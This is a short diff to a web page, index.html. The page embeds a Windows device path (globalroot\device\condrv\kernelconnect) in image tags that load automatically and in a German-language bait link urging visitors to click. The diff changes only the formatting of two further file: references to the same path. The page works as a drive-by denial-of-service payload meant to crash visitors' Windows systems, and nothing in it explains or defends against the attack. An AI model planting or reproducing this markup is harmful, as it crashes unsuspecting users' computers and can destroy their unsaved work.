--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
 <img src="http://globalroot\device\condrv\kernelconnect" height="100" width="200" alt="meinpenis" border="2" align="right" hspace="50" vspace="50">
 <img src="\\.\globalroot\device\condrv\kernelconnect" />
 <a href="\\.\globalroot\device\condrv\kernelconnect">Guckt mal link möchte geklickt werden</a> 
-[URL]file:[/\\.\globalroot\device\condrv\kernelconnect[/URL]
-file:[/\\.\globalroot\device\condrv\kernelconnect
+<[URL]file:[/\\.\globalroot\device\condrv\kernelconnect[/URL]>
+<file:[/\\.\globalroot\device\condrv\kernelconnect>
 </body>
 </html>
